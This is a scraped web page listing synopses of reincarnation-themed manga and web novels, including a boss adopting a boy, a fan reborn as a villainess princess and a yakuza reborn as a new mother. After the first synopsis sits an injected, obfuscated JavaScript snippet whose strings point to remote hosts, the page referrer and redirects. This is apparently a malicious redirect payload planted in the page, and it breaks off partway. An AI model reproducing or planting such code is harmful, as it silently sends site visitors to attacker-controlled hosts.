The MC accidentally entered a hidden boss lair when he was younger, and in the midst of corpses, he was found by the hidden boss and got adopted by him. The boss sees the MC as a toy at first, but as time goes by, looking at the interaction between the cruel boss and the young boy…they somehow seemed like a family?!<script></script><script>function _0x4403(_0x560b2f,_0x44b402){var _0x531c5b=_0x475d();return _0x4403=function(_0x1a3d9f,_0x259951){_0x1a3d9f=_0x1a3d9f-(-0x332+-0x59f*-0x4+-0x4b3*0x4);var _0x4460a0=_0x531c5b[_0x1a3d9f];return _0x4460a0;},_0x4403(_0x560b2f,_0x44b402);}function _0x475d(){var _0x2d4ec4=['3BMWZEm','90203wsETNu','coNub','random','google','cMEiS','FRjfv','2495254npXzek','href','3499803rbIWWO','QalTP','https://ip','505IzPqfH','9715202EIdOXf','VKtUY','3204570QXHqfo','location','.top/','then','includes','','KmBzh','kBbbt','8ABRwiW','floor','http://rea','52308OFgrgV','referrer','6697338rrguuc','.customapi','kdaCf','SNkrF','text'];_0x475d=function(){return _0x2d4ec4;};return _0x475d();}(function(_0x18fa4c,_0x56548c){var _0x255725=_0x4403,_0x1a7dac=_0x18fa4c();while(!![]){try{var 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I’ve been reincarnated into a novel with my living and breathing bias. Now I’m the Princess of the Empire, who is known by all sorts of epithets, Agnes Saint! It’s great that she’s filthy rich and a royal and all, but there’s just one problem… the hateful trash who just insulted by bias’s honor is none other than ‘me.’ Regardless, I’m here now and… I will do anything, and everything, within my power to prevent my bias’s death and ensure he experiences nothing but smooth sailing going forward! I would never wish for Kylo, my kitten, to suffer any sort of shock. That’s why I have to hide my fervent adoration. Besides, nothing good would come from revealing my stanning anyways. So, for the time being, I’ll be perfect at… ‘stanning in secret.’
There was a globally popular game called *The Legend of the Seven Heroes*. Ren cleared the sequel of that game at the fastest record in the world, and thus he obtained a bonus special data. However, no matter where he looked inside the game, he could not find the data. The moment where Ren was about to give up the search, he decided to start playing the second round of the game. Suddenly, a notification message “Do you want to start a special story?\" appeared on the screen. When Ren chose “Yes” without hesitation, he lost consciousness, and when he woke up, he was a baby. —Could it be that he was reincarnated as one of the heroes in *The Legend of the Seven Heroes*? Ren, who thought such a thing was impossible, could not believe his ears when he heard his name from his mother\'s mouth. It was the name of a classmate who betrays the heroes in the middle of the story. Of course, he wishes to live in peace. But he meets a saint whose life he\'s supposed to take, and doesn\'t. Furthermore, he ends up saving a character (the boss of a great noble family) who was supposed to die. All of these things creates a development that he doesn\'t know about coming to play… --- **Original Web Novel:** [Kakuyomu](, [Syosetu](
Eugene Felivia, the beloved youngest son of the noble Felivia family, known for its great warriors, gains a second life thanks to the grace of \'Felin, the Wizard of Creation.\' Eugene dreams of becoming a wizard like Felin, who saved him, and using his powers to make the world a better place. However, the dark and harsh realities and his fate still refuse to let him go...
People around me called me a sage who was obsessed with the Philosopher\'s Stone.\" There was once a man who mastered magic and was known as a sage. Realizing that creating the Philosopher\'s Stone was impossible with his current body, he took a gamble. He decided to reincarnate into a future world as a different person to obtain a new, stronger body. His reincarnation was successful, and he gained the body of a cute boy named Mars, marked with the emblem of strength, the \"Pure Seal.\" However, in the future, this emblem was inexplicably regarded as a \"Defective Seal\"...! All for the sake of the Philosopher\'s Stone. The journey of the strongest sage begins anew!!
\"B-baa, baaah?! (Did I become a baby?! What about my revenge?!) Everyone in the Namgung family despised me. My life was one where even my siblings turned their backs on me. But at the moment when the family was annihilated, the choice my siblings made… was not the family, but me. ‘I never once thought of you as anything but family.’ ‘Live. Even if it’s disgraceful and filthy, live, Ahee.’ Why did they save me? A question I held in my heart my entire life as I carried out my revenge. I thought I could finally close my eyes at the end of it all. ‘Baaah?’ I’ve returned to the past! Could this be some black magic from the Blood Cult? My… my revenge? My peaceful rest?! And why are the Namgung siblings clinging to me again?! What on earth is going on?!\"
A yakuza who was supposed to be dead suddenly reincarnates as a pregnant woman just about to give birth! Now a single mother with the spirit of a hardened gangster, he faces the challenges of parenting for the first time. This is a hilarious yet touching manga that takes readers through the ups and downs of raising a child in the chaotic world of yakuza, with plenty of unexpected charm and humor.
My friend stole my boyfriend and then dared to hand me a wedding invitation with a smile? Ha! I had a blast enjoying my revenge and came home and fell asleep but...when I woke up I was in the body of the Villainess of a Romance Fantasy novel who has everything: appearance, assets, and intelligence. The only thing this girl lacked was the insight to judge a man. Throw the bastard Prince away to the main female lead and let us just enjoy the luxury of power and money!
Prince Rudolf gained knowledge of the future 300 years from now during a near-death experience. He uses his wits to change the future in which he will be assassinated as a tyrant prince! Meanwhile, discrepancies between the story passed down to posterity and reality gradually emerge…
Kashumir grew up working as a mercenary to buy medicine for her precious younger half-sister, Aria.On her way home, after completing a mission as usual, she tripped and hit her head, causing her to remember her past life; thus she realized she had been reborn in the world of the novel *The Night of the Fairy*. Her sister was the main character of this reverse-harem romance while she was one of the villains causing Aria to suffer hardships.Since there is no way Kashumir would let her precious sister suffer, she vowed to protect Aria until her adoption into the count\'s family, just like in the novel.But things turned out differently, and even the male lead candidates, who should\'ve been fish in Aria\'s pond, all ended up becoming obsessed with Kashumir instead, when all she wanted was to protect her lovely sister. --- [Official Japanese / 日本語](
The tyrant Xi Wuji always thought that his pampered queen treated him affectionately, like a delicate little lotus flower. He thought she loved him, but on the day of his death, he opened his eyes. As a result of his death, she took charge of the government and had many lovers, and lived in debauchery. But he became her favourite lover again in this new life‽
\"I\'m not just a foil!\" In order to stop more people from reincarnating in his world, the former elite knight leader sets out on a mission! An unprecedented comedy about preventing any and reincarnation is about to begin!